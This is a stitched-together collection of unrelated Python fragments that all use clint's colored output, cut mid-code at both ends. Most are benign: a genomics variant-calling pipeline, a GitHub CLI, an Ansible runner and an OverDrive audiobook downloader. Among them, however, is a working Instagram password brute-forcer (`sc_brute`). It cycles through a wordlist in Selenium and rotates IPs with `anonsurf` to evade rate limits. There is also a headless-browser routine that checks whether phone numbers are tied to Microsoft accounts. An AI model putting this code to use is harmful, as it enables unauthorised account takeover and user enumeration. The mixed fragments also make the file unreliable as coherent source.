cmds.append( "nanopolish variants --min-flanking-sequence 10 -x %s --progress -t %s --reads %s -o %s.%s.vcf -b %s.trimmed.rg.sorted.bam -g %s -w \"%s\" --ploidy 1 -m 0.15 --read-group %s %s" % (args.max_haplotypes, args.threads, indexed_nanopolish_file, args.sample, p, args.sample, ref, nanopolish_header, p, nanopolish_extra_args)) merge_vcf_cmd = "artic_vcf_merge %s %s" % (args.sample, bed) for p in pools: merge_vcf_cmd += " %s:%s.%s.vcf" % (p, args.sample, p) cmds.append(merge_vcf_cmd) if args.medaka: cmds.append("bgzip -f %s.merged.vcf" % (args.sample)) cmds.append("tabix -p vcf %s.merged.vcf.gz" % (args.sample)) cmds.append( "longshot -P 0 -F -A --no_haps --bam %s.primertrimmed.rg.sorted.bam --ref %s --out %s.longshot.vcf --potential_variants %s.merged.vcf.gz" % (args.sample, ref, args.sample, args.sample)) cmds.append( "artic_vcf_filter --longshot %s.longshot.vcf %s.pass.vcf %s.fail.vcf" % (args.sample, args.sample, args.sample)) else: cmds.append( "artic_vcf_filter --nanopolish %s.merged.vcf %s.pass.vcf %s.fail.vcf" % (args.sample, args.sample, args.sample)) cmds.append( "artic_make_depth_mask --store-rg-depths %s %s.primertrimmed.rg.sorted.bam %s.coverage_mask.txt" % (ref, args.sample, args.sample)) cmds.append( "artic_plot_amplicon_depth --primerScheme %s --sampleID %s --outFilePrefix %s %s*.depths" % (bed, args.sample, args.sample, args.sample)) vcf_file = "%s.pass.vcf" % (args.sample, ) cmds.append("bgzip -f %s" % (vcf_file)) cmds.append("tabix -p vcf %s.gz" % (vcf_file)) # artic_mask must be run before bcftools consensus cmds.append( "artic_mask %s %s.coverage_mask.txt %s.fail.vcf %s.preconsensus.fasta" % (ref, args.sample, args.sample, args.sample)) cmds.append( "bcftools consensus -f %s.preconsensus.fasta %s.gz -m %s.coverage_mask.txt -o %s.consensus.fasta" % (args.sample, vcf_file, args.sample, args.sample)) if args.medaka: method = 'medaka' else: method = 'nanopolish' fasta_header = "%s/ARTIC/%s" % (args.sample, method) cmds.append("artic_fasta_header %s.consensus.fasta \"%s\"" % (args.sample, fasta_header)) cmds.append("cat %s.consensus.fasta %s > %s.muscle.in.fasta" % (args.sample, ref, args.sample)) cmds.append("muscle -in %s.muscle.in.fasta -out %s.muscle.out.fasta" % (args.sample, args.sample)) for cmd in cmds: print(colored.green("Running: ") + cmd, file=sys.stderr) if not args.dry_run: timerStart = time.perf_counter() retval = os.system(cmd) if retval != 0: print(colored.red('Command failed:') + cmd, file=sys.stderr) raise SystemExit(20) timerStop = time.perf_counter() # print the executed command and the runtime to the log file print("{}\t{}".format(cmd, timerStop - timerStart), file=logfh) # if it's a dry run, print just the command else: print(cmd, file=logfh) logfh.close()
def begin(): if os.path.exists(CONFIG_FILE): pass else: # create config file create_config() # commit changes commit_changes() if args.flags.contains(('--version', '-v')): puts(version()) sys.exit(0) elif args.get(0) == None: get_help() elif args.flags.contains(('--help', '-h')) or args.get(0) == 'help': get_help() sys.exit(0) elif args.get(0) == 'create': if args.get(1) == None: puts('{0}. {1}'.format( colored.blue('octogit'), colored.red( 'You need to pass both a project name and description'))) else: project_name = args.get(1) description = args.get(2) or '' organization = args.get(3) create_repository(project_name, description, organization=organization) sys.exit() elif args.flags.contains(('--issues', '-i')) or args.get(0) == 'issues': url = find_github_remote() username, url = get_username_and_repo(url) if args.get(1) == 'create': if args.get(2) == None: puts('{0}. {1}'.format( colored.blue('octogit'), colored.red('You need to pass an issue title'))) sys.exit(-1) else: issue_name = args.get(2) description = args.get(3) create_issue(username, url, issue_name, description) sys.exit(0) issue_number = None try: issue_number = args.get(1) except: pass if issue_number is not None: if args.get(2) == 'close': close_issue(username, url, issue_number) sys.exit(0) elif args.get(2) == 'view': view_issue(username, url, issue_number) sys.exit(0) elif args.get(1) == '--assigned': get_issues(username, url, args.flags.contains(('--assigned', '-a'))) sys.exit(0) else: get_single_issue(username, url, issue_number) sys.exit(0) else: get_issues(username, url, False) sys.exit(0) elif args.flags.contains(('--login', '-l')) or args.get(0) == 'login': if args.get(1) == None or args.get(2) == None: puts('{0}. {1}'.format( colored.blue('octogit'), colored.red('You need both a password and username to login'))) else: username = args.get(1) password = args.get(2) login(username, password) else: get_help() sys.exit(0)
def err(text): puts(colored.red('✘ {0}'.format(text)), stream=sys.stderr.write)
def get_crypto_qty(max_num, input_type, user_prompt=DEFAULT_PROMPT, default_input=None, show_default=False, quit_ok=False): assert input_type in UNIT_CHOICES, input_type if default_input and show_default: prompt_to_use = '%s [%s]: ' % (user_prompt, default_input) else: prompt_to_use = '%s: ' % user_prompt user_input = raw_input(prompt_to_use).strip().strip('"') if default_input and not user_input: return int(default_input) if quit_ok and user_input in ['q', 'Q', 'b', 'B']: return False try: user_input_cleaned = user_input.replace(',', '') if user_input_cleaned == '-1': # for sweeping return -1 user_float = float(user_input_cleaned) except ValueError: if not user_input_cleaned: puts(colored.red('No entry. Please enter something.')) else: puts( colored.red('%s is not an integer. Please try again.' % user_input)) return get_crypto_qty( max_num=max_num, input_type=input_type, user_prompt=user_prompt, default_input=default_input, show_default=show_default, quit_ok=quit_ok, ) if user_float <= 0: puts( colored.red('%s <= 0. Please try again.' % (format_output(user_float, output_type=input_type), ))) return get_crypto_qty( max_num=max_num, input_type=input_type, user_prompt=user_prompt, default_input=default_input, show_default=show_default, quit_ok=quit_ok, ) if max_num is not None and user_float > max_num: puts( colored.red('%s > %s. Please try again.' % ( format_output(user_float, output_type=input_type), format_output(max_num, output_type=input_type), ))) return get_crypto_qty( max_num=max_num, input_type=input_type, user_prompt=user_prompt, default_input=default_input, show_default=show_default, quit_ok=quit_ok, ) return user_float
def microsoft(phone_number): global name global microsoft_load_balancer microsoft_load_balancer = True options = webdriver.ChromeOptions() options.add_argument('--headless') options.add_argument('--no-sandbox') options.add_argument('disable-infobars') options.add_experimental_option('prefs', {'intl.accept_languages': 'en,en_US'}) options.add_argument("--lang=en") prefs = { "translate_whitelists": { "ru": "en" }, "translate": { "enabled": "true" } } options.add_experimental_option("prefs", prefs) options.add_argument( "user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" ) loc = os.getcwd() driver = uc.Chrome(options=options) driver.get("https://login.live.com/") try: WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, '/html/body/div/form[1]/div/div/div[1]/div[2]/div[2]/div/div/div/div[2]/div[2]/div/input[1]' ))).send_keys(phone_number) WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, "/html/body/div/form[1]/div/div/div[1]/div[2]/div[2]/div/div/div/div[4]/div/div/div/div/input" ))).click() #/html/body/div/form[1]/div/div/div[1]/div[2]/div[2]/div/div[2]/div/div[2]/div/div[2]/input WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, "/html/body/div/form[1]/div/div/div[1]/div[2]/div[2]/div/div[2]/div/div[2]/div/div[2]/input" ))).send_keys("QWKEQĞPWEQWE") WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, "/html/body/div/form[1]/div/div/div[1]/div[2]/div[2]/div/div[2]/div/div[3]/div[2]/div/div/div/div/input" ))).click() name = WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, "/html/body/div/form[1]/div/div/div[1]/div[2]/div[2]/div/div[2]/div/div[2]/div/div[1]/div" ))).text name = "This Phone Number Is Connected To A Micr0s0ft Account!" print(colored.green("[+]") + colored.blue(name)) except: name = "This Phone Number Is Not Connected To Any Micr0s0ft Account!" print(colored.magenta("[-]") + colored.red(name)) microsoft_load_balancer = False driver.close()
def _poll_stack_events(awsclient, stack_name, last_event=None): # http://stackoverflow.com/questions/796008/cant-subtract-offset-naive-and-offset-aware-datetimes/25662061#25662061 finished_statuses = ['CREATE_COMPLETE', 'CREATE_FAILED', 'DELETE_COMPLETE', 'DELETE_FAILED', 'ROLLBACK_COMPLETE', 'ROLLBACK_FAILED', 'UPDATE_COMPLETE', 'UPDATE_ROLLBACK_COMPLETE', 'UPDATE_ROLLBACK_FAILED'] failed_statuses = ['CREATE_FAILED', 'DELETE_FAILED', 'ROLLBACK_COMPLETE', 'ROLLBACK_FAILED', 'UPDATE_ROLLBACK_COMPLETE', 'UPDATE_ROLLBACK_FAILED'] warning_statuses = ['ROLLBACK_IN_PROGRESS', 'UPDATE_ROLLBACK_COMPLETE_CLEANUP_IN_PROGRESS', 'UPDATE_ROLLBACK_IN_PROGRESS'] success_statuses = ['CREATE_COMPLETE', 'DELETE_COMPLETE', 'UPDATE_COMPLETE'] seen_events = [] # print len(seen_events) client = awsclient.get_client('cloudformation') status = '' # for the delete command we need the stack_id stack_id = get_stack_id(awsclient, stack_name) print('%-50s %-25s %-50s %-25s\n' % ('Resource Status', 'Resource ID', 'Reason', 'Timestamp')) while status not in finished_statuses: response = client.describe_stack_events(StackName=stack_id) for event in response['StackEvents'][::-1]: if event['EventId'] not in seen_events and \ (not last_event or event['Timestamp'] > last_event): seen_events.append(event['EventId']) resource_status = event['ResourceStatus'] resource_id = event['LogicalResourceId'] # this is not always present try: reason = event['ResourceStatusReason'] except KeyError: reason = '' timestamp = str(event['Timestamp']) message = '%-50s %-25s %-50s %-25s\n' % ( resource_status, resource_id, reason, timestamp) if resource_status in failed_statuses: print(colored.red(message)) elif resource_status in warning_statuses: print(colored.yellow(message)) elif resource_status in success_statuses: print(colored.green(message)) else: print(message) if event['LogicalResourceId'] == stack_name: status = event['ResourceStatus'] time.sleep(5) exit_code = 0 if status not in success_statuses: exit_code = 1 return exit_code
def abort(message): puts(colored.red(message))
def route(self, action, name, flags): if not action in self.valid_actions: puts(colored.red('%s is not a valid action' %action)) exit() getattr(self, action)(name)
def sc_brute(username, password_wordlist): ip_changer() ip_adr = subprocess.check_output(["curl", "icanhazip.com", "-s"]) ip_adr = ip_adr.decode() print(colored.red("-") * 50) print( colored.red("[") + colored.green("+") + colored.red("]") + colored.green("Your Ip Address Has Been Changed To:") + colored.blue(str(ip_adr))) print( colored.red("[") + colored.magenta("!") + colored.red("]") + colored.yellow( "Speed Of The Attack Depends On The Proxy Server.It Could Be Fast Or Slow." )) print(colored.red("-") * 50) start_insta(username) x = 0 while (x <= len(password_wordlist)): try: WebDriverWait(driver, 10).until( EC.element_to_be_clickable( (By.XPATH, '//*[@id="password"]'))).send_keys( Keys.CONTROL, "a", Keys.DELETE) WebDriverWait(driver, 10).until( EC.element_to_be_clickable( (By.XPATH, '//*[@id="password"]'))).send_keys(password_wordlist[x]) time.sleep(1) time.sleep(1) with open("Passwords/entered_passwords.txt", "a+") as fi: fi.write("\n" + password_wordlist[x]) except: continue try: captcha = WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, '/html/body/div[1]/section/main/article/div[2]/div[1]/div/form/div[7]/p' ))).text if "your password was incorrect." in captcha: print( colored.red("[-]Password Is Not:") + colored.magenta(password_wordlist[x])) elif "a problem" in captcha or "couldn't connect to Instagram" in captcha: if x > 0: x = x - 1 print( colored.red("[") + colored.green("+") + colored.red("]") + "Changing Your Ip Address For Security Purposes Please Wait." ) os.system("xterm -e anonsurf restart") ip_adr = subprocess.check_output( ["curl", "icanhazip.com", "-s"]) ip_adr = ip_adr.decode() print(colored.red("-") * 50) print( colored.red("[") + colored.green("+") + colored.red("]") + colored.green("Your Ip Address Has Been Changed To:") + colored.blue(str(ip_adr))) print( colored.red("[") + colored.magenta("!") + colored.red("]") + colored.yellow( "Speed Of The Attack Depends On The Proxy Server.It Could Be Fast Or Slow." )) print(colored.red("-") * 50) start_insta(username) WebDriverWait(driver, 10).until( EC.element_to_be_clickable( (By.XPATH, '//*[@id="password"]'))).send_keys( Keys.CONTROL, "a", Keys.DELETE) WebDriverWait(driver, 10).until( EC.element_to_be_clickable( (By.XPATH, '//*[@id="password"]'))).send_keys( password_wordlist[x]) time.sleep(3) time.sleep(1) with open("Passwords/entered_passwords.txt", "a+") as fi: fi.write("\n" + password_wordlist[x]) else: print( colored.green("[+]Password FOUND!! -->") + colored.blue(password_wordlist[x])) except: try: WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, "/html/body/div[3]/section/nav/div[2]/div/div/div[2]/div/div" ))).click() print( colored.green("[+]Password FOUND!! -->") + colored.blue(password_wordlist[x])) break exit() except: try: #/html/body/div[1]/section/main/div/article/div/div[3]/div/a[1] WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, "/html/body/div[1]/section/main/div/article/div/div[3]/div/a[1]" ))).click() print( colored.green("[+]Password FOUND!! -->") + colored.blue(password_wordlist[x])) break exit() except: #/html/body/div[1]/section/nav/div[2]/div/div/div[1]/a/div/div/img try: WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, "/html/body/div[1]/section/nav/div[2]/div/div/div[1]/a/div/div/img" ))).click() print( colored.green("[+]Password FOUND!! -->") + colored.blue(password_wordlist[x])) break exit() except: pass x += 1 for j in password_wordlist: with open("Passwords/entered_passwords.txt", "r") as fenerbahce: same = fenerbahce.readlines() if not j in same: with open("Passwords/not_entered_passwords.txt", "a+") as file: file.write(j)
from clint.textui import colored import os print print print colored.red(" --- Enter your Twilio information below to complete install --- ") print print account_sid = raw_input('Twilio Account Sid: ') auth_token = raw_input('Twilio Auth Token: ') config = """\n\n# Configuration Auto-generated during installation SECRET_KEY = {} TWILIO_ACCOUNT_SID = '{}' TWILIO_AUTH_TOKEN = '{}'""".format(repr(os.urandom(20)), account_sid, auth_token) f = open('rapid_response_kit/utils/config.py', 'rw') contents = f.read() f.close() f = open('rapid_response_kit/utils/config.py', 'w') f.write(contents + config) f.close() print print print colored.red(" --- Would you like to add other credentials now? ---") print print decision = raw_input("Type 'yes' or 'no': ")
import time import os import sys from bs4 import BeautifulSoup import sys from clint.textui import colored import optparse import time from clint.textui import colored from threading import Thread a = subprocess.check_output(["id"]) if not "root" in a.decode(): print( colored.red( "[-]This Feature Requires Root Permission. Please Be Sure That You Are Root!" )) exit() def ip_changer(): print( colored.red("[") + colored.green("+") + colored.red("]") + "Changing Your Ip Address For Security Purposes Please Wait.") os.system("xterm -e anonsurf start") def ip_stop(): os.system("xterm -e anonsurf stop")
os.mkdir(rantempdir) log.wac("CREATED " + rantempdir) count = 0 for root, dirs, files in os.walk(root, topdown=False): if "clusters" not in root: log.whac(root) if len(dirs) == 1: print(colored.yellow("CLUSTERING SINGLE"), root, colored.yellow(emoticons.get_ran_emot("meh"))) log.wac("CLUSTERING SINGLE " + root) tablename = [x for x in files if ".table" in x][0] cmd = py + " " + DI + "cluster_single.py " + root + " " + logfile os.system(cmd) else: print(colored.blue("CLUSTERING INTERNAL"), root, colored.blue(emoticons.get_ran_emot("meh"))) log.wac("CLUSTERING INTERNAL " + root) tablename = [x for x in files if ".table" in x][0] if root[-1] != "/": root = root + "/" cmd = py + " " + DI + "cluster_internal.py " + root + " " + root + tablename + " " + logfile + " " + rantempdir rc = subprocess.call(cmd, shell=True) if rc != 0: print(colored.red("PROBLEM WITH CLUSTERING INTERNAL"), colored.red(emoticons.get_ran_emot("sad"))) sys.exit(1) cmd = py + " " + DI + "annotate_clusters.py " + sys.argv[1] os.system(cmd) cmd = py + " " + DI + "post_process_cluster_info.py " + sys.argv[1] os.system(cmd)
def run(self, args, unknown_args): environment = get_environment(args.environment) ansible_context = AnsibleContext(args) public_vars = environment.public_vars def _run_ansible(args, *unknown_args): cmd_parts = ( 'ANSIBLE_CONFIG={}'.format( os.path.join(ANSIBLE_DIR, 'ansible.cfg')), 'ansible', args.inventory_group, '-m', args.module, '-i', environment.paths.inventory_ini, '-u', args.remote_user, '-a', args.module_args, '--diff', ) + tuple(unknown_args) become = args.become or bool(args.become_user) become_user = args.become_user include_vars = False if become: cmd_parts += ('--become', ) if become_user not in ('cchq', ): # ansible user can do things as cchq without a password, # but needs the ansible user password in order to do things as other users. # In that case, we need to pull in the vault variable containing this password include_vars = True if become_user: cmd_parts += ('--become-user', args.become_user) if include_vars: cmd_parts += ( '-e', '@{}'.format(environment.paths.vault_yml), '-e', '@{}'.format(environment.paths.public_yml), ) ask_vault_pass = include_vars and public_vars.get( 'commcare_cloud_use_vault', True) if ask_vault_pass: cmd_parts += ('--vault-password-file=/bin/cat', ) cmd_parts += get_common_ssh_args(public_vars) cmd = ' '.join(shlex_quote(arg) for arg in cmd_parts) print_command(cmd) p = subprocess.Popen(cmd, stdin=subprocess.PIPE, shell=True, env=ansible_context.env_vars) if ask_vault_pass: p.communicate(input='{}\n'.format( ansible_context.get_ansible_vault_password())) else: p.communicate() return p.returncode def run_check(): return _run_ansible(args, '--check', *unknown_args) def run_apply(): return _run_ansible(args, *unknown_args) exit_code = 0 if args.skip_check: user_wants_to_apply = ask( 'Do you want to apply without running the check first?', quiet=args.quiet) else: exit_code = run_check() if exit_code == 1: # this means there was an error before ansible was able to start running exit(exit_code) return # for IDE elif exit_code == 0: puts( colored.green( u"✓ Check completed with status code {}".format( exit_code))) user_wants_to_apply = ask( 'Do you want to apply these changes?', quiet=args.quiet) else: puts( colored.red(u"✗ Check failed with status code {}".format( exit_code))) user_wants_to_apply = ask( 'Do you want to try to apply these changes anyway?', quiet=args.quiet) if user_wants_to_apply: exit_code = run_apply() if exit_code == 0: puts( colored.green( u"✓ Apply completed with status code {}".format( exit_code))) else: puts( colored.red(u"✗ Apply failed with status code {}".format( exit_code))) exit(exit_code)
def ip_changer(): print( colored.red("[") + colored.green("+") + colored.red("]") + "Changing Your Ip Address For Security Purposes Please Wait.") os.system("xterm -e anonsurf start")
def run(): parser = argparse.ArgumentParser( prog='odmpy', description='Download/return an Overdrive loan audiobook', epilog='Version {}. Source at https://github.com/ping/odmpy/'.format( __version__)) parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', help='Enable more verbose messages for debugging') subparsers = parser.add_subparsers( title='Available commands', dest='subparser_name', help='To get more help, use the -h option with the command.') parser_info = subparsers.add_parser( 'info', description='Get information about a loan file.', help='Get information about a loan file') parser_info.add_argument('odm_file', type=str, help='ODM file path') parser_dl = subparsers.add_parser('dl', description='Download from a loan file.', help='Download from a loan file') parser_dl.add_argument('-d', '--downloaddir', dest='download_dir', default='.', help='Download folder path') parser_dl.add_argument('-c', '--chapters', dest='add_chapters', action='store_true', help='Add chapter marks (experimental)') parser_dl.add_argument( '-m', '--merge', dest='merge_output', action='store_true', help='Merge into 1 file (experimental, requires ffmpeg)') parser_dl.add_argument( '-k', '--keepcover', dest='always_keep_cover', action='store_true', help='Always generate the cover image file (cover.jpg)') parser_dl.add_argument('odm_file', type=str, help='ODM file path') parser_ret = subparsers.add_parser('ret', description='Return a loan file.', help='Return a loan file.') parser_ret.add_argument('odm_file', type=str, help='ODM file path') args = parser.parse_args() if args.verbose: logger.setLevel(logging.DEBUG) xml_doc = xml.etree.ElementTree.parse(args.odm_file) root = xml_doc.getroot() if args.subparser_name == 'ret': logger.info('Returning {} ...'.format(args.odm_file)) early_return_url = root.find('EarlyReturnURL').text try: early_return_res = requests.get(early_return_url, headers={'User-Agent': UA_LONG}, timeout=10) early_return_res.raise_for_status() logger.info('Loan returned successfully: {}'.format(args.odm_file)) except HTTPError as he: if he.response.status_code == 403: logger.warning('Loan is probably already returned.') sys.exit() logger.error( 'Unexpected HTTPError while trying to return loan {}'.format( args.odm_file)) logger.error('HTTPError: {}'.format(str(he))) logger.debug(he.response.content) sys.exit(1) except ConnectionError as ce: logger.error('ConnectionError: {}'.format(str(ce))) sys.exit(1) sys.exit() metadata = None for t in root.itertext(): if not t.startswith('<Metadata>'): continue metadata = xml.etree.ElementTree.fromstring( # remove invalid & char re.sub(r'\s&\s', ' & ', t)) break title = metadata.find('Title').text cover_url = metadata.find('CoverUrl').text authors = [ c.text for c in metadata.find('Creators') if 'Author' in c.attrib.get('role', '') ] if not authors: authors = [c.text for c in metadata.find('Creators')] publisher = metadata.find('Publisher').text description = metadata.find('Description').text if metadata.find( 'Description') is not None else '' if args.subparser_name == 'info': logger.info(u'{:10} {}'.format('Title:', colored.blue(title))) logger.info(u'{:10} {}'.format( 'Creators:', colored.blue(u', '.join([ u'{} ({})'.format(c.text, c.attrib['role']) for c in metadata.find('Creators') ])))) logger.info(u'{:10} {}'.format('Publisher:', metadata.find('Publisher').text)) logger.info(u'{:10} {}'.format( 'Subjects:', u', '.join([c.text for c in metadata.find('Subjects')]))) logger.info(u'{:10} {}'.format( 'Languages:', u', '.join([c.text for c in metadata.find('Languages')]))) logger.info(u'{:10} \n{}'.format('Description:', metadata.find('Description').text)) for formats in root.findall('Formats'): for f in formats: logger.info(u'\n{:10} {}'.format('Format:', f.attrib['name'])) parts = f.find('Parts') for p in parts: logger.info('* {} - {} ({:,.0f}kB)'.format( p.attrib['name'], p.attrib['duration'], math.ceil(1.0 * int(p.attrib['filesize']) / 1024))) sys.exit() download_baseurl = '' download_parts = [] for formats in root.findall('Formats'): for f in formats: protocols = f.find('Protocols') for p in protocols: if p.attrib.get('method', '') != 'download': continue download_baseurl = p.attrib['baseurl'] break parts = f.find('Parts') for p in parts: download_parts.append(p.attrib) logger.info('Downloading "{}" by "{}" in {} parts...'.format( colored.blue(title, bold=True), colored.blue(', '.join(authors)), len(download_parts))) book_folder = os.path.join(args.download_dir, u'{} - {}'.format(title, u', '.join(authors))) if not os.path.exists(book_folder): os.makedirs(book_folder) cover_filename = os.path.join(book_folder, 'cover.jpg') if not os.path.isfile(cover_filename): cover_res = requests.get(cover_url, headers={'User-Agent': UA}) cover_res.raise_for_status() with open(cover_filename, 'wb') as outfile: outfile.write(cover_res.content) acquisition_url = root.find('License').find('AcquisitionUrl').text media_id = root.attrib['id'] client_id = str(uuid.uuid1()).upper() raw_hash = '{client_id}|{omc}|{os}|ELOSNOC*AIDEM*EVIRDREVO'.format( client_id=client_id, omc=OMC, os=OS) m = hashlib.sha1(raw_hash.encode('utf-16-le')) license_hash = base64.b64encode(m.digest()) # Extract license # License file is downloadable only once per odm # so we keep it in case downloads fail _, odm_filename = os.path.split(args.odm_file) license_file = os.path.join(args.download_dir, odm_filename.replace('.odm', '.license')) if os.path.isfile(license_file): logger.warning( 'Already downloaded license file: {}'.format(license_file)) else: # download license file params = OrderedDict([('MediaID', media_id), ('ClientID', client_id), ('OMC', OMC), ('OS', OS), ('Hash', license_hash)]) license_res = requests.get(acquisition_url, params=params, headers={'User-Agent': UA}, timeout=10, stream=True) try: license_res.raise_for_status() with open(license_file, 'wb') as outfile: for chunk in license_res.iter_content(1024): outfile.write(chunk) logger.debug('Saved license file {}'.format(license_file)) except HTTPError as he: if he.response.status_code == 404: # odm file has expired logger.error('The loan file "{}" has expired.' 'Please download again.'.format(args.odm_file)) else: logger.error(he.response.content) sys.exit(1) except ConnectionError as ce: logger.error('ConnectionError: {}'.format(str(ce))) sys.exit(1) license_xml_doc = xml.etree.ElementTree.parse(license_file) license_root = license_xml_doc.getroot() ns = '{http://license.overdrive.com/2008/03/License.xsd}' license_client = license_root.find('{}SignedInfo'.format(ns)).find( '{}ClientID'.format(ns)) license_client_id = license_client.text lic_file_contents = '' with open(license_file, 'r') as lic_file: lic_file_contents = lic_file.read() cover_bytes = None with open(cover_filename, 'rb') as f: cover_bytes = f.read() track_count = 0 file_tracks = [] keep_cover = args.always_keep_cover audio_lengths_ms = [] for p in download_parts: part_number = int(p['number']) part_filename = os.path.join( book_folder, u'{}.mp3'.format( slugify(u'{} - Part {:02d}'.format(title, part_number), allow_unicode=True))) part_tmp_filename = u'{}.part'.format(part_filename) if os.path.isfile(part_filename): logger.warning('Already saved {}'.format( colored.magenta(part_filename))) continue part_file_size = int(p['filesize']) part_url_filename = p['filename'] part_download_url = '{}/{}'.format(download_baseurl, part_url_filename) part_markers = [] try: part_download_res = requests.get(part_download_url, headers={ 'User-Agent': UA, 'ClientID': license_client_id, 'License': lic_file_contents }, timeout=10, stream=True) part_download_res.raise_for_status() chunk_size = 1024 expected_chunk_count = math.ceil(1.0 * part_file_size / chunk_size) with open(part_tmp_filename, 'wb') as outfile: for chunk in progress.bar( part_download_res.iter_content(chunk_size=chunk_size), label='Part {}'.format(part_number), expected_size=expected_chunk_count): if chunk: outfile.write(chunk) os.rename(part_tmp_filename, part_filename) try: audiofile = eyed3.load(part_filename) if not audiofile.tag.title: audiofile.tag.title = u'{}'.format(title) if not audiofile.tag.album: audiofile.tag.album = u'{}'.format(title) if not audiofile.tag.artist: audiofile.tag.artist = u'{}'.format(authors[0]) if not audiofile.tag.album_artist: audiofile.tag.album_artist = u'{}'.format(authors[0]) if not audiofile.tag.track_num: audiofile.tag.track_num = (part_number, len(download_parts)) if not audiofile.tag.publisher: audiofile.tag.publisher = u'{}'.format(publisher) if eyed3.id3.frames.COMMENT_FID not in audiofile.tag.frame_set: audiofile.tag.comments.set(u'{}'.format(description), description=u'Description') audiofile.tag.images.set( art.TO_ID3_ART_TYPES[art.FRONT_COVER][0], cover_bytes, 'image/jpeg', description=u'Cover') audiofile.tag.save() audio_lengths_ms.append( int(round(audiofile.info.time_secs * 1000))) for frame in audiofile.tag.frame_set.get( eyed3.id3.frames.USERTEXT_FID, []): if frame.description != 'OverDrive MediaMarkers': continue if frame.text: try: tree = xml.etree.ElementTree.fromstring(frame.text) except UnicodeEncodeError: tree = xml.etree.ElementTree.fromstring( frame.text.encode('ascii', 'ignore').decode('ascii')) for m in tree.iter('Marker'): marker_name = m.find('Name').text marker_timestamp = m.find('Time').text timestamp = None ts_mark = 0 for r in ('%M:%S.%f', '%H:%M:%S.%f'): try: timestamp = time.strptime( marker_timestamp, r) ts = datetime.timedelta( hours=timestamp.tm_hour, minutes=timestamp.tm_min, seconds=timestamp.tm_sec) ts_mark = int(1000 * ts.total_seconds()) break except ValueError: pass if not timestamp: # some invalid timestamp string, e.g. 60:15.00 mobj = re.match(MARKER_TIMESTAMP_HHMMSS, marker_timestamp) if mobj: ts_mark = int(mobj.group('hr')) * 60 * 60 * 1000 + \ int(mobj.group('min')) * 60 * 1000 + \ int(mobj.group('sec'))* 1000 + \ int(mobj.group('ms')) else: mobj = re.match(MARKER_TIMESTAMP_MMSS, marker_timestamp) if mobj: ts_mark = int(mobj.group('min')) * 60 * 1000 + \ int(mobj.group('sec')) * 1000 + \ int(mobj.group('ms')) else: raise ValueError( 'Invalid marker timestamp: {}'. format(marker_timestamp)) track_count += 1 part_markers.append( (u'ch{:02d}'.format(track_count), marker_name, ts_mark)) break if args.add_chapters and not args.merge_output: # set the chapter marks generated_markers = [] for j, file_marker in enumerate(part_markers): generated_markers.append({ 'id': file_marker[0], 'text': file_marker[1], 'start_time': int(file_marker[2]), 'end_time': int( round(audiofile.info.time_secs * 1000) if j == ( len(part_markers) - 1) else part_markers[j + 1][2]), }) toc = audiofile.tag.table_of_contents.set( 'toc'.encode('ascii'), toplevel=True, ordered=True, child_ids=[], description=u"Table of Contents") for i, m in enumerate(generated_markers): title_frameset = eyed3.id3.frames.FrameSet() title_frameset.setTextFrame(eyed3.id3.frames.TITLE_FID, u'{}'.format(m['text'])) chap = audiofile.tag.chapters.set( m['id'].encode('ascii'), times=(m['start_time'], m['end_time']), sub_frames=title_frameset) toc.child_ids.append(chap.element_id) logger.debug( u'Added chap tag => {}: {}-{} "{}" to "{}"'.format( colored.cyan(m['id']), m['start_time'], m['end_time'], colored.cyan(m['text']), colored.blue(part_filename))) if len(generated_markers) == 1: # Weird player problem on voice where title is shown instead of chapter title audiofile.tag.title = u'{}'.format( generated_markers[0]['text']) audiofile.tag.frame_set.get( eyed3.id3.frames.TITLE_FID )[0].encoding = eyed3.id3.UTF_8_ENCODING audiofile.tag.save() except Exception as e: logger.warning('Error saving ID3: {}'.format( colored.red(str(e), bold=True))) keep_cover = True logger.info('Saved "{}"'.format(colored.magenta(part_filename))) file_tracks.append({ 'file': part_filename, 'markers': part_markers, }) except HTTPError as he: logger.error('HTTPError: {}'.format(str(he))) logger.debug(he.response.content) sys.exit(1) except ConnectionError as ce: logger.error('ConnectionError: {}'.format(str(ce))) sys.exit(1) if args.merge_output: book_filename = os.path.join( book_folder, u'{} - {}.mp3'.format(title, u', '.join(authors))) if os.path.isfile(book_filename): logger.warning('Already saved "{}"'.format( colored.magenta(book_filename))) sys.exit(0) cmd = [ 'ffmpeg', '-y', '-loglevel', 'info' if logger.level == logging.DEBUG else 'error', '-i', 'concat:{}'.format('|'.join([f['file'] for f in file_tracks])), '-acodec', 'copy', book_filename ] exit_code = subprocess.call(cmd) if exit_code: logger.error( 'ffmpeg exited with the code: {0!s}'.format(exit_code)) logger.error('Command: {0!s}'.format(' '.join(cmd))) exit(exit_code) audiofile = eyed3.load(book_filename) audiofile.tag.title = u'{}'.format(title) if not audiofile.tag.album: audiofile.tag.album = u'{}'.format(title) if not audiofile.tag.artist: audiofile.tag.artist = u'{}'.format(authors[0]) if not audiofile.tag.album_artist: audiofile.tag.album_artist = u'{}'.format(authors[0]) if not audiofile.tag.publisher: audiofile.tag.publisher = u'{}'.format(publisher) if eyed3.id3.frames.COMMENT_FID not in audiofile.tag.frame_set: audiofile.tag.comments.set(u'{}'.format(description), description=u'Description') if args.add_chapters: merged_markers = [] for i, f in enumerate(file_tracks): prev_tracks_len_ms = 0 if i == 0 else reduce( lambda x, y: x + y, audio_lengths_ms[0:i]) this_track_endtime_ms = int( reduce(lambda x, y: x + y, audio_lengths_ms[0:i + 1])) file_markers = f['markers'] for j, file_marker in enumerate(file_markers): merged_markers.append({ 'id': file_marker[0], 'text': u'{}'.format(file_marker[1]), 'start_time': int(file_marker[2]) + prev_tracks_len_ms, 'end_time': int(this_track_endtime_ms if j == ( len(file_markers) - 1) else file_markers[j + 1][2] + prev_tracks_len_ms), 